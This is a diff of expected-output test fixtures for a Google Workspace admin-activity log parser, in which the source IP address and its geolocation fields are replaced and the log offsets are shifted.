@@ -1947,27 +1815,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 14645, + "log.offset": 14612, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1991,7 +1855,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GMAIL_RESET_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"GMAIL_RESET_REASON\",\"value\":\"reason\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GMAIL_RESET_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"GMAIL_RESET_REASON\",\"value\":\"reason\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2004,28 +1868,24 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 15096, + "log.offset": 15062, "message": "reason", "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2049,7 +1909,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_LAST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_LAST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2064,27 +1924,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 15523, + "log.offset": 15488, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2108,7 +1964,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_ADDED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_ADDED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2122,27 +1978,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 15973, + "log.offset": 15937, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2166,7 +2018,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_REMOVED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_REMOVED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2180,27 +2032,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 16402, + "log.offset": 16365, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2224,7 +2072,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2238,27 +2086,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 16833, + "log.offset": 16795, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2282,7 +2126,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2296,27 +2140,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 17249, + "log.offset": 17210, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2340,7 +2180,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2353,27 +2193,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 17668, + "log.offset": 17628, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2397,7 +2233,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD_ON_NEXT_LOGIN\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD_ON_NEXT_LOGIN\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2412,27 +2248,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 18047, + "log.offset": 18006, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2456,7 +2288,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_PENDING_INVITES_LIST\"}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_PENDING_INVITES_LIST\"}}", "event.provider": "admin", "event.type": [ "info" 
@@ -2467,26 +2299,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 18510, + "log.offset": 18468, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2507,7 +2335,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2520,27 +2348,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 18839, + "log.offset": 18796, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2564,7 +2388,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2577,27 +2401,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 19224, + "log.offset": 19180, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2621,7 +2441,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_ACCOUNT_INFO\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_ACCOUNT_INFO\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "info", 
@@ -2634,27 +2454,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 19609, + "log.offset": 19564, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
